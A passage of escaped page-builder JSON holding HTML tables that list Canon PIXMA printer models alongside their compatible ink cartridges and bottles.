(Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr align=\\\"center\\\"><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>CL-831 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td>PG-830 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-831 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-830 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n<td>CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP610<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP628<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP638<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP648<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800R<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP810<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP830<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 